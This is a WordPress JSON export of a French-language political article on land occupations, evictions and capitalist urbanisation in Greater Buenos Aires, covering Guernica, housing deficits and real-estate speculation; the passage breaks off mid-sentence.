{"id":21140,"date":"2020-09-22T20:14:26","date_gmt":"2020-09-22T20:14:26","guid":{"rendered":"http:\/\/www.lapluma.net\/?p=21140"},"modified":"2020-09-22T20:29:31","modified_gmt":"2020-09-22T20:29:31","slug":"argentina-toma-de-tierras-la-lucha-de-clases-urbana","status":"publish","type":"post","link":"https:\/\/www.lapluma.net\/fr\/2020\/09\/22\/argentina-toma-de-tierras-la-lucha-de-clases-urbana\/","title":{"rendered":"Argentine : L\u2019accaparement des terres et l\u2019urbanisation capitaliste. La lutte de classes en milieu urbain"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">L\u2019une des occupations de terre les plus embl\u00e9matiques de ces derniers mois est celle de <em>Guernica<\/em> [dans la p\u00e9riph\u00e9rie du Grand Buenos Aires] : elle couvre 100 hectares, divis\u00e9s en 4 quartiers. Il y a 2500 familles et 3000 enfants. Les porte-parole de ces habitants disent aux journalistes qu\u2019ils ne se trouvent pas dans des terres occup\u00e9es mais dans un quartier. Les faits les confirment : ils ont avanc\u00e9 dans la partition des hectares, creus\u00e9 des foss\u00e9s et install\u00e9 des poteaux d\u2019\u00e9clairage. Il y a des espaces pr\u00e9vus pour une \u00e9cole, un jardin d\u2019enfants et une place. L\u2019urbanisation des pauvres, qui manquent de toutes sortes de ressources, montre la capacit\u00e9 cr\u00e9ative de ces habitants-travailleurs. Les occupants d\u2019une terre qui \u00e9tait en d\u00e9su\u00e9tude il y a des ann\u00e9es d\u00e9noncent que les forces de police les emp\u00eachent de faire entrer dans les mat\u00e9riaux pour construire leurs maisons. Ils vivent en prison dans leur ville, sous la menace d\u2019une expulsion.<\/span><\/p>\n<figure style=\"width: 593px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.cadtm.org\/local\/cache-vignettes\/L640xH384\/arton18949-e62c2.jpg?1600422621\" alt=\"\" width=\"593\" height=\"356\" \/><figcaption class=\"wp-caption-text\"><strong>Occupation de terrains pour des logements pr\u00e9caires<\/strong><\/figcaption><\/figure>\n<div id=\"outil_sommaire\" class=\"cs_sommaire cs_sommaire_avec_fond\">\n<div class=\"cs_sommaire_inner\">\n<div class=\"cs_sommaire_titre_avec_fond cs_done\" style=\"padding-left: 280px;\">\u00a0 Sommaire<\/div>\n<div class=\"cs_sommaire_corps\" style=\"padding-left: 280px;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><a title=\"Baissez vos armes\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#baissez_vos_armes\">Baissez vos armes<\/a><\/li>\n<li><a title=\"L'urbanisation capitaliste\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#l_urbanisation_capitaliste\">L\u2019urbanisation capitaliste<\/a><\/li>\n<li><a title=\"Des paradis priv\u00e9s sans papier\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#des_paradis_prives_sans_papier\">Des paradis priv\u00e9s sans papier<\/a><\/li>\n<li><a title=\"R\u00e9pondre aux besoins sociaux\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#repondre_aux_besoins_sociaux\">R\u00e9pondre aux besoins sociaux<\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Dans d\u2019autres occupations de terres, avec moins de familles, la menace est devenue une r\u00e9alit\u00e9\u00a0: dans la nuit du jeudi 10 septembre, la juge Sandra Arroyo Salgado de San Isidro, accompagn\u00e9e de la police f\u00e9d\u00e9rale et de forces de la police de Buenos Aires, a proc\u00e9d\u00e9, avec un bulldozer, \u00e0 la prise de contr\u00f4le des terrains proches des lignes ferroviaires de San Fernando (localit\u00e9 du Grand Buenos Aires). La demande constante d\u2019expulsion a \u00e9t\u00e9 promue par le maire de San Fernando, Juan Andreotti, par le pr\u00e9sident de la Chambre des d\u00e9put\u00e9s, Sergio Massa, et par la bureaucratie du syndicat des chemins de fer. Cette derni\u00e8re a accompagn\u00e9 le juge avec une bande pour assurer l\u2019expulsion et a c\u00e9l\u00e9br\u00e9 la fin des travaux en d\u00e9truisant leurs maisons auto-construites. Vendredi soir, un groupe de voisins s\u2019est rendu sur des terrains occup\u00e9s dans le secteur de La Matanza [province de Buenos Aires] pour d\u00e9placer les gens. Ils ont \u00e9t\u00e9 soutenus par la police de Buenos Aires, expulsant 300 familles du quartier de Los Pilares dans Ciudad Evita. Les concessions accord\u00e9es par le gouverneur, Axel Kicillof, ont huil\u00e9 le corps de cette satan\u00e9e police pour qu\u2019elle tire sur des personnes \u00e2g\u00e9es et des enfants \u00e0 partir de motos et de camionnettes. La besogne s\u2019est termin\u00e9e par une c\u00e9l\u00e9bration\u00a0: l\u2019incendie des auto-constructions.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Dans une situation marqu\u00e9e par l\u2019effondrement \u00e9conomique de 20\u00a0% au deuxi\u00e8me trimestre de cette ann\u00e9e (avril-juin) par rapport \u00e0 2019, o\u00f9 la moiti\u00e9 de la population est probablement d\u00e9j\u00e0 plong\u00e9e dans la pauvret\u00e9, o\u00f9 le ch\u00f4mage progresse et les revenus sont d\u00e9truits par la combinaison mortelle de la pand\u00e9mie et de l\u2019<a class=\"cs_glossaire\" href=\"http:\/\/www.cadtm.org\/Inflation\" name=\"mot991_0\"><span class=\"gl_mot\">inflation<\/span><\/a>, la \u00ab\u00a0triple alliance\u00a0\u00bb du gouvernement (national, provincial et municipal), de la justice et de la bureaucratie syndicale trouve comme principale r\u00e9ponse de r\u00e9primer ceux qui n\u2019ont rien. La crise \u00e9conomique, sociale et sanitaire a \u00e9clat\u00e9 de plein fouet, exprimant d\u2019autres manques de longue date en mati\u00e8re de logement et d\u2019urbanisation.<\/span><\/p>\n<h3 id=\"baissez_vos_armes\" class=\"spip\" style=\"text-align: center;\"><a class=\"sommaire_ancre\" title=\"Sommaire\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#outil_sommaire\">\u00a0<\/a>Baissez vos armes<\/h3>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Pablo Vitale est codirecteur de l\u2019<i>Asociaci\u00f3n Civil por la Igualdad y la Justicia<\/i> (ACIJ) et est membre du groupe d\u2019\u00e9tudes urbaines de l\u2019Institut de recherche Gino Germani. Interrog\u00e9 par <i>Ideas de Izquierda<\/i>, Pablo Vitale explique que l\u2019occupation des terres est tr\u00e8s r\u00e9pandue en Am\u00e9rique latine, \u00e0 tel point que dans certaines villes \u00ab\u00a0un pourcentage tr\u00e8s \u00e9lev\u00e9 de la ville existante et de la population vit dans des \u00e9tablissements informels, dans des territoires occup\u00e9s qui \u00e9taient \u00e0 l\u2019origine consid\u00e9r\u00e9s comme ill\u00e9gaux\u00a0\u00bb. Selon Lucas Jord\u00e1n Dombroski<span class=\"spip_note_ref\">\u00a0[<a id=\"nh1\" class=\"spip_note\" title=\"Lucas Jord\u00e1n Dombroski, \u201cLos territorios de asentamientos en el borde\u00a0(...)\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nb1\" rel=\"appendix\">1<\/a>]<\/span>, urbaniste et chercheur au Conicet [centre de recherche], le nombre de logements informels varie de 30 \u00e0 60\u00a0% \u00e0 Mexico, S\u00e3o Paulo, Rio de Janeiro, Lima, Caracas et Bogota. Pablo Vitale dit qu\u2019en Argentine, c\u2019est un ph\u00e9nom\u00e8ne qui a une histoire. Il commence \u00e0 la fin du XIX<sup class=\"typo_exposants\">e<\/sup> si\u00e8cle et au d\u00e9but du XX<sup class=\"typo_exposants\">e<\/sup> si\u00e8cle. Mais depuis le d\u00e9but des ann\u00e9es 1980, les occupations ont acquis une caract\u00e9ristique distinctive par rapport aux \u00e9poques pr\u00e9c\u00e9dentes. Lors de la derni\u00e8re dictature civilo-militaire [1976-1983], 90\u00a0% de la population vivant dans les bidonvilles de la ville de Buenos Aires a \u00e9t\u00e9 expuls\u00e9e. C\u2019est ainsi que \u00ab\u00a0les quartiers informels du sud de la ville se sont form\u00e9s, notamment \u00e0 Quilmes, dans le cordon sud, qui, en g\u00e9n\u00e9ral, a pris une configuration, en forme de bloc, plus r\u00e9guli\u00e8re, qui a donn\u00e9 une continuit\u00e9 aux environs\u00a0\u00bb. Actuellement, le ph\u00e9nom\u00e8ne r\u00e9pond \u00e0 un autre sch\u00e9ma\u00a0: \u00ab\u00a0\u00e0 un besoin de logement non r\u00e9solu par les m\u00e9canismes du march\u00e9 et les politiques du logement\u00a0\u00bb.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Selon le recensement national de 2010, le d\u00e9ficit de logements atteint 3,5 millions\u00a0: il comprend 1,3 million de logements manquants et 2,2 millions de logements qui n\u2019offrent pas \u00e0 ceux qui y vivent les conditions minimales pour maintenir un niveau de vie d\u00e9cent. Il n\u2019existe pas de donn\u00e9es actuelles sur ce d\u00e9ficit, mais d\u2019autres informations pr\u00e9sentent un tableau inqui\u00e9tant. Il y a actuellement quelque 9 millions de personnes qui sont locataires. Selon les donn\u00e9es de l\u2019Indec [Institut national de la statistique], au cours des premiers mois de 2019, 34\u00a0% des logements du pays \u00e9taient inad\u00e9quats en raison d\u2019un manque de connexion aux infrastructures publiques ou des caract\u00e9ristiques propres \u00e0 la construction. Dans la province de Buenos Aires, la situation est plus grave\u00a0: 46\u00a0% des logements sont inad\u00e9quats. Il est \u00e9vident que le Grand Buenos Aires concentre la majorit\u00e9 de ces foyers. Selon les informations du minist\u00e8re de l\u2019Infrastructure et des services publics de la province, le d\u00e9ficit actuel en mati\u00e8re de logement dans la juridiction est de 900 000 foyers. Au premier trimestre 2020, selon l\u2019Indec, il y avait 21 millions d\u2019emplois dans le pays. Au moins la moiti\u00e9 de ces travailleurs sont naufrag\u00e9s, le plus souvent ils se trouvent dans la pr\u00e9carit\u00e9 et l\u2019informalit\u00e9. Il y a une interconnexion entre le travail pr\u00e9caire et le logement\u00a0: outre le ch\u00f4mage, les emplois sont domin\u00e9s par ceux de type informel, par les vendeurs de rue, les forains et les travailleurs et travailleuses domestiques. Ce sont ceux qui ne pouvaient et ne peuvent plus payer leur loyer ou qui \u00e9taient d\u00e9j\u00e0 dans la rue. Les femmes fuyant la violence sexiste avec leurs enfants dans les bras.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Les grandes firmes m\u00e9diatiques contribuent \u00e0 la confusion g\u00e9n\u00e9rale avec la m\u00e9thode classique de prendre la partie pour le tout\u00a0: elles trouvent toujours un cacique de quartier [p\u00e9roniste] ou une personne (qui existe) pour stigmatiser les occupations et nier la r\u00e9alit\u00e9 de d\u00e9gradation sociale g\u00e9n\u00e9ralis\u00e9e. Ces occupations sont une recherche d\u00e9sesp\u00e9r\u00e9e pour soulager la mis\u00e8re provoqu\u00e9e par le syst\u00e8me capitaliste, qui traite m\u00eame le droit au logement, inscrit dans la Constitution nationale, comme du \u00ab\u00a0papier br\u00fbl\u00e9\u00a0\u00bb. Guadalupe Granero Realini est urbaniste et chercheuse au Centre d\u2019\u00e9tudes m\u00e9tropolitaines. <i>Ideas de Izquierda<\/i> lui a demand\u00e9 son avis sur les occupations. Elle a r\u00e9pondu ainsi\u00a0:<\/span><\/p>\n<ul style=\"text-align: justify;\">\n<li style=\"list-style-type: none;\">\n<ul class=\"spip\">\n<li><span style=\"font-size: 12pt;\">\u00ab\u00a0D\u2019une part, il y a l\u2019approche m\u00e9diatique qui remet en jeu la pr\u00e9\u00e9minence du point de vue juridique sur les conflits sociaux et la contradiction historique entre le droit \u00e0 la propri\u00e9t\u00e9 priv\u00e9e et la fonction sociale de la propri\u00e9t\u00e9 (FSP) [son objectif est d\u2019utiliser les maisons vides ou les terrains laiss\u00e9s en friche\u00a0; il ne s\u2019agit pas d\u2019une opposition \u00e0 la propri\u00e9t\u00e9 priv\u00e9e mais d\u2019une r\u00e9gulation de la propri\u00e9t\u00e9 priv\u00e9e]. Le fait que le premier est constitutionnellement consacr\u00e9, avec des marges tr\u00e8s larges dans le code civil et aussi avec une validation culturelle profond\u00e9ment enracin\u00e9e, fait oublier que la FSP est inscrite dans le droit international et dans les trait\u00e9s auxquels l\u2019Argentine adh\u00e8re et qui ont rang constitutionnel.\u00a0\u00bb<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Par cons\u00e9quent, \u00ab\u00a0vous allumez la t\u00e9l\u00e9vision et la question du logement est en fait une simple question normative et les occupations sont des actes ill\u00e9gaux. Point \u00e0 la ligne.\u00a0\u00bb Elle conclut qu\u2019\u00ab\u00a0il est assez difficile d\u2019\u00e9chapper au sens commun de la propri\u00e9t\u00e9 priv\u00e9e\u00a0\u00bb.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Guadalupe Granero Realini estime que\u00a0:<\/span><\/p>\n<ul style=\"text-align: justify;\">\n<li style=\"list-style-type: none;\">\n<ul class=\"spip\">\n<li><span style=\"font-size: 12pt;\">\u00ab\u00a0Historiquement, les politiques de logement en Argentine ont \u00e9t\u00e9 pens\u00e9es dans cette optique, celle d\u2019\u00eatre propri\u00e9taire. Et l\u2019approche de la question du logement a longtemps maintenu le sujet dans l\u2019orbite de donner des r\u00e9ponses \u00e0 travers des \u00ab\u00a0solutions de logement\u00a0\u00bb, c\u2019est-\u00e0-dire des maisons individuelles. Depuis quelques ann\u00e9es \u2013 je dirais que c\u2019est surtout \u00e0 cause du militantisme et des changements dans le domaine de l\u2019urbanisme \u2013 le droit au logement est pens\u00e9 dans la dimension de l\u2019habitat, de tout ce qui implique la localisation, l\u2019acc\u00e8s aux infrastructures et aux services, la dimension propre \u00e0 l\u2019existence de sujets de droit et d\u2019autres questions. Ceci, avec l\u2019aide de l\u2019\u00e9conomie urbaine, a contribu\u00e9 \u00e0 d\u00e9mystifier le fait que les bidonvilles et les colonies de peuplement sont le r\u00e9sultat des \u00e9checs du march\u00e9 et \u00e0 comprendre qu\u2019il s\u2019agit au contraire du march\u00e9 foncier en parfait \u00e9tat de fonctionnement.\u00a0\u00bb<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Cela a impr\u00e9gn\u00e9 la politique publique. Cependant, Guadalupe Granero Realini souligne que de nombreuses limites persistent\u00a0: \u00ab\u00a0Il manque une approche d\u2019ensemble sur l\u2019in\u00e9galit\u00e9 et donc sur la mani\u00e8re globale dont les villes sont produites qui n\u2019est pas remise en question.\u00a0\u00bb<\/span><\/p>\n<h3 id=\"l_urbanisation_capitaliste\" class=\"spip\" style=\"text-align: center;\"><a class=\"sommaire_ancre\" title=\"Sommaire\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#outil_sommaire\">\u00a0<\/a>L\u2019urbanisation capitaliste<\/h3>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Le sociologue fran\u00e7ais [et auteur de nombreux ouvrages sur la rente fonci\u00e8re et la question urbaine] Christian Topalov, dans son livre <i>La urbanizaci\u00f3n capitalista<\/i><span class=\"spip_note_ref\">\u00a0[<a id=\"nh2\" class=\"spip_note\" title=\"Topalov, Christian (1978), La urbanizaci\u00f3n capitalista : algunos elementos\u00a0(...)\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nb2\" rel=\"appendix\">2<\/a>]<\/span>, publi\u00e9 dans les ann\u00e9es 1970, a d\u00e9clar\u00e9 que le d\u00e9veloppement urbain comprend une forme de socialisation capitaliste des forces productives. Qu\u2019est-ce que cela signifie\u00a0? Cette urbanit\u00e9 offre aux entreprises les conditions g\u00e9n\u00e9rales pour d\u00e9velopper leurs activit\u00e9s. Quelles sont ces conditions\u00a0? En premier lieu, elle offre l\u2019infrastructure physique n\u00e9cessaire \u00e0 la production et au transport (comme les routes, les ports, les trains, la fourniture de services d\u2019\u00e9lectricit\u00e9 et autres)\u00a0; en deuxi\u00e8me lieu, elle constitue une r\u00e9serve de main-d\u2019\u0153uvre, de la force de travail, qui se reproduit en utilisant des \u00e9quipements collectifs de consommation (logements, \u00e9coles, h\u00f4pitaux, espaces publics)\u00a0; en troisi\u00e8me lieu, elle rassemble un ensemble d\u2019entreprises priv\u00e9es capitalistes, dans le secteur productif ou de la distribution, dont la coop\u00e9ration (contradictoire, en termes de concurrence capitaliste) dans cet espace augmente la productivit\u00e9.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><img loading=\"lazy\" decoding=\"async\" class=\" alignleft\" src=\"http:\/\/www.cadtm.org\/local\/cache-vignettes\/L323xH512\/christiantopalov-645x1024-23361.jpg?1600422621\" width=\"266\" height=\"422\" \/>Dans cette articulation des conditions, l\u2019urbanisation constitue une valeur d\u2019usage complexe\u00a0: elle n\u2019a pas de valeur d\u2019\u00e9change. Ce n\u2019est pas une marchandise qui peut \u00eatre achet\u00e9e et vendue. Ainsi, l\u2019urbanisation comporte plusieurs contradictions\u00a0: la principale est que le d\u00e9veloppement de ses composantes montre la puissance de la socialisation des forces productives, ce que les capitalistes n\u2019aiment pas, ni n\u2019aiment devoir contribuer, via les imp\u00f4ts, \u00e0 son financement. C\u2019est pourquoi le capital est en permanence press\u00e9 d\u2019int\u00e9grer des \u00e9l\u00e9ments sp\u00e9cifiques d\u2019utilit\u00e9 commune dans sa sph\u00e8re de valorisation\u00a0: privatisation de l\u2019\u00e9ducation, de la sant\u00e9, des services publics\u00a0; ou encore gestion priv\u00e9e des autoroutes, des ports, parmi bien d\u2019autres entreprises. De m\u00eame, elle cherche \u00e0 obtenir des loyers par l\u2019appropriation priv\u00e9e de l\u2019utilisation des terres. \u00c0 travers ces contradictions, le d\u00e9veloppement urbain pr\u00e9sente une lutte de classes \u00ab\u00a0\u00e0 ciel ouvert\u00a0\u00bb.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Topalov \u00e9crit en relation avec l\u2019exp\u00e9rience de la fin des ann\u00e9es 1960 en France avec la mont\u00e9e de l\u2019\u00c9tat providence et l\u2019incorporation de l\u2019urbanisme dans les sph\u00e8res \u00e9tatiques. La planification capitaliste de l\u2019urbanisation par nature fait pencher la balance en faveur des grandes entreprises. Cette caract\u00e9ristique a \u00e9t\u00e9 exacerb\u00e9e par le n\u00e9olib\u00e9ralisme.<\/span><\/p>\n<h3 id=\"des_paradis_prives_sans_papier\" class=\"spip\" style=\"text-align: center;\"><a class=\"sommaire_ancre\" title=\"Sommaire\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#outil_sommaire\">\u00a0<\/a>Des paradis priv\u00e9s sans papier<\/h3>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Pour simplifier, disons que la terre n\u2019a pas de valeur (elle n\u2019est pas produite par la main-d\u2019\u0153uvre, mais par \u00ab\u00a0M\u00e8re Nature\u00a0\u00bb), mais elle a un prix d\u00e9termin\u00e9 par le revenu<span class=\"spip_note_ref\">\u00a0[<a id=\"nh3\" class=\"spip_note\" title=\"Dans d\u2019autres textes, Topalov analyse en profondeur les revenus qu\u2019il\u00a0(...)\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nb3\" rel=\"appendix\">3<\/a>]<\/span>, qui est le transfert \u00e0 la propri\u00e9t\u00e9 de la terre des surprofits que le capital peut obtenir de son utilisation. Les investissements publics dans les infrastructures, la fourniture de services publics et d\u2019autres dispositifs dans l\u2019environnement urbain augmentent le prix des terrains et les revenus que peuvent obtenir les entreprises qui s\u2019approprient ces terrains. L\u2019environnement b\u00e2ti vaut plus que les terres st\u00e9riles. L\u2019\u00c9tat fournit de l\u2019argent, \u00e9tablit des r\u00e8gles et ouvre la voie aux grands groupes immobiliers pour qu\u2019ils s\u2019approprient les loyers.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Un exemple de la ville de Buenos Aires illustre bien ce point. En plus des proc\u00e9dures opaques de planification urbaine, un rapport du CELS (Centro de Estudios Legales y Sociales) explique que pour \u00ab\u00a0rendre le projet Solares de Santa Mar\u00eda viable, le minist\u00e8re du D\u00e9veloppement urbain et des transports locaux a sign\u00e9, en novembre 2016, une convention de planification urbaine avec la soci\u00e9t\u00e9 IRSA, l\u2019actuel propri\u00e9taire du terrain qu\u2019elle a acquis en 1997 pour 50 millions de dollars. Le projet est pr\u00e9vu pour le vieux quartier sportif de La Boca \u00e0 Buenos Aires. Au nord, le projet est limit\u00e9 au quartier de Rodrigo Bueno o\u00f9 environ 1000 familles vivent dans des conditions pr\u00e9caires\u00a0: l\u00e0, le gouvernement de la ville encourage l\u2019am\u00e9lioration et la construction de nouveaux logements pour lutter contre la pauvret\u00e9. L\u2019IRSA est charg\u00e9e de verser \u00e0 la ville 50 millions de dollars suppl\u00e9mentaires pour l\u2019approbation environnementale et urbaine, l\u2019autorisation de diviser le terrain et la modification du zonage. Ainsi, \u00ab\u00a0l\u2019acceptation du projet immobilier et l\u2019attribution de nouvelles utilisations et densit\u00e9s de terrain par le l\u00e9gislateur impliqueront une valeur fonci\u00e8re \u00e0 hauteur de quelque 570 millions de dollars\u00a0\u00bb. C\u2019est-\u00e0-dire dix fois plus que le prix initial pay\u00e9 par l\u2019IRSA pour la propri\u00e9t\u00e9<span class=\"spip_note_ref\">\u00a0[<a id=\"nh4\" class=\"spip_note\" title=\"Centro de Estudios Legales y Sociales (CELS), \u201cReglas a medida. Empresas y\u00a0(...)\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nb4\" rel=\"appendix\">4<\/a>]<\/span>. La ville de Buenos Aires est prolifique dans ce type de d\u00e9veloppement immobilier millionnaire, allant m\u00eame jusqu\u2019\u00e0 c\u00e9der des terrains publics.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Sur une \u00e9chelle inf\u00e9rieure, Guernica exprime la pression en faveur de l\u2019appropriation priv\u00e9e de la rente fonci\u00e8re par le capital immobilier. Blanca Cantero, du Frente Renovador dans le Frente de Todos [coalition qui a r\u00e9uni le Parti justicialiste, le Rente Renovador, le Movimiento Evita et qui conduisit la campagne pr\u00e9sidentielle d\u2019Alberto Fernandez en 2019], est la maire de la municipalit\u00e9 de Presidente Per\u00f3n. Elle a dit qu\u2019elle avait d\u2019autres plans pour les terres occup\u00e9es. Selon Laura Taffetani de l\u2019Association des avocats, qui parraine les enfants qui sont dans l\u2019occupation, la maire a \u00e9t\u00e9 tr\u00e8s claire lors d\u2019une r\u00e9union de la table de \u00ab\u00a0dialogue\u00a0\u00bb. Elle a d\u00e9clar\u00e9 qu\u2019elle \u00ab\u00a0avait ses dix-huit countries [ensemble r\u00e9sidentiel enclos] et que cela fournirait une source de travail pour tous les habitants de Guernica et que c\u2019est sa priorit\u00e9\u00a0\u00bb. Selon Laura Taffetani, il s\u2019agit d\u2019une pratique courante\u00a0: une grande partie des terres de l\u2019agglom\u00e9ration est \u00ab\u00a0r\u00e9serv\u00e9e\u00a0\u00bb gr\u00e2ce \u00e0 des accords entre les municipalit\u00e9s et les grandes soci\u00e9t\u00e9s immobili\u00e8res.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Christian Topalov faisait r\u00e9f\u00e9rence \u00e0 ces ph\u00e9nom\u00e8nes. Il affirmait\u00a0: \u00ab\u00a0Le d\u00e9veloppement des groupes monopolistiques et leur rattachement \u00e0 l\u2019\u00c9tat permettront un contr\u00f4le croissant, par les p\u00f4les priv\u00e9s, de la formation des effets utiles de l\u2019agglom\u00e9ration\u00a0\u00bb. Il va m\u00eame plus loin en soulignant que \u00ab\u00a0le capital monopolistique produira des valeurs d\u2019usage complexes [par] la production coordonn\u00e9e de maisons, de magasins, de bureaux ou d\u2019usines sous le contr\u00f4le d\u2019un m\u00eame centre et le contr\u00f4le par ce dernier de la production de valeurs d\u2019usage qui ne circuleront pas comme des marchandises\u00a0: infrastructures et \u00e9quipements publics\u00a0\u00bb.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">En 1972, Juli\u00e1n Astolfoni, un constructeur de logements sociaux pour l\u2019\u00c9tat, a achet\u00e9 \u00e0 des \u00ab\u00a0prix prudents\u00a0\u00bb 1600 hectares de terres \u00ab\u00a0humides et boueuses\u00a0\u00bb \u00e0 Tigre [ville de la province de Buenos Aires]. Pendant la dictature, cet homme d\u2019affaires a man\u0153uvr\u00e9 pour \u00e9liminer son concurrent Mackentor\u00a0: un commando dirig\u00e9 par Luciano Benjam\u00edn Men\u00e9ndez [commandant du 3<sup class=\"typo_exposants\">e<\/sup> corps de l\u2019arm\u00e9e, un des plus hauts responsables de la r\u00e9pression d\u00e9velopp\u00e9e par la dictature, responsable du centre clandestin de d\u00e9tention de La Perla] a arr\u00eat\u00e9 et envoy\u00e9 le personnel de l\u2019entreprise concurrente dans des centres de d\u00e9tention clandestins. En 1977, dans la province de Buenos Aires, la dictature civilo-militaire a approuv\u00e9 le d\u00e9cret-loi 8912 sur l\u2019ordre territorial et l\u2019utilisation des terres, ce qui a ouvert la voie aux quartiers priv\u00e9s [enclos] comme mod\u00e8le de d\u00e9veloppement urbain.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">En 1998, Eduardo Constantini a achet\u00e9 50\u00a0% du projet d\u2019Astolfoni pour ces hectares et lui a donn\u00e9 sa touche glamour. C\u2019est ainsi qu\u2019a commenc\u00e9 le d\u00e9veloppement de Nordelta, l\u2019une des communaut\u00e9s prot\u00e9g\u00e9es embl\u00e9matiques du XXI<sup class=\"typo_exposants\">e<\/sup> si\u00e8cle. Le r\u00e9am\u00e9nagement de l\u2019autoroute panam\u00e9ricaine dans les ann\u00e9es 1990 a favoris\u00e9 la circulation et la valorisation de ce terrain. \u00ab\u00a0Nous sommes des agents de l\u2019organisation de la soci\u00e9t\u00e9 pour fournir un habitat \u00e0 un certain secteur social\u00a0\u00bb, a d\u00e9clar\u00e9 Constantini au journaliste Diego Genoud<span class=\"spip_note_ref\">\u00a0[<a id=\"nh5\" class=\"spip_note\" title=\"Esta informaci\u00f3n est\u00e1 en el cap\u00edtulo dedicado a Constantini en el libro Los\u00a0(...)\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nb5\" rel=\"appendix\">5<\/a>]<\/span>. Le propri\u00e9taire de Consultatio [firme d\u2019investissement immobilier] a continu\u00e9 \u00e0 monopoliser les terres. En 2010, selon le maire de Tigre de l\u2019\u00e9poque, Sergio Massa, le quartier prot\u00e9g\u00e9 de Nordelta a r\u00e9ussi \u00e0 acheter, pour 20 dollars le m\u00e8tre carr\u00e9, un terrain que la loi r\u00e9servait pour un parc public. Ces terrains non am\u00e9nag\u00e9s \u00e9taient \u00e9valu\u00e9s entre 100 et 300 dollars. Et entre 800 et 900 dollars une fois d\u00e9velopp\u00e9s<span class=\"spip_note_ref\">\u00a0[<a id=\"nh6\" class=\"spip_note\" title=\"Cecilia Rodr\u00edguez, \u201cNegocios que huelen mal : Massa entreg\u00f3 tierras p\u00fablicas a\u00a0(...)\" href=\"http:\/\/www.cadtm.org\/Argentine-L-accaparement-des-terres-et-l-urbanisation-capitaliste-La-lutte-de#nb6\" rel=\"appendix\">6<\/a>]<\/span>. Le \u00ab\u00a0sp\u00e9culateur\u00a0\u00bb Sergio Massa, qui est tr\u00e8s \u00ab\u00a0courageux\u00a0\u00bb pour demander l\u2019expulsion et enlever l\u2019allocation universelle pour enfant (AUH) aux familles pauvres, s\u2019identifie beaucoup mieux aux besoins fondamentaux de lphome d\u2019affaires Constantini.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Ce n\u2019est pas un cas isol\u00e9. Dans un communiqu\u00e9 d\u2019organisations sociales demandant un dialogue sur la prise de contr\u00f4le de Guernica, il est indiqu\u00e9 que \u00ab\u00a0dans la seule province de Buenos Aires, environ 500 quartiers priv\u00e9s (enclos) ont \u00e9t\u00e9 construits sans autorisation. Historiquement, cela a \u00e9t\u00e9 possible parce que les promoteurs immobiliers n\u2019\u00e9taient pas sanctionn\u00e9s et qu\u2019ensuite des facilit\u00e9s ont \u00e9t\u00e9 fournies pour la r\u00e9gularisation de ces d\u00e9veloppements ill\u00e9gaux, avec des r\u00e8gles faites sur mesure.\u00a0\u00bb Dans le rapport du CELS mentionn\u00e9 ci-dessus, il est indiqu\u00e9 qu\u2019entre 2013 et 2017 un grand nombre des dossiers d\u2019urbanisation dans la province de Buenos Aires \u00e9taient li\u00e9s \u00e0 des urbanisations ferm\u00e9es (enclos). Un \u00ab\u00a0ensemble significatif de non-conformit\u00e9s, d\u2019incoh\u00e9rences, d\u2019\u00e9tapes saut\u00e9es et de d\u00e9fauts formels\u00a0\u00bb a \u00e9t\u00e9 d\u00e9tect\u00e9. Le rapport du CELS inclut l\u2019avis de Gast\u00f3n 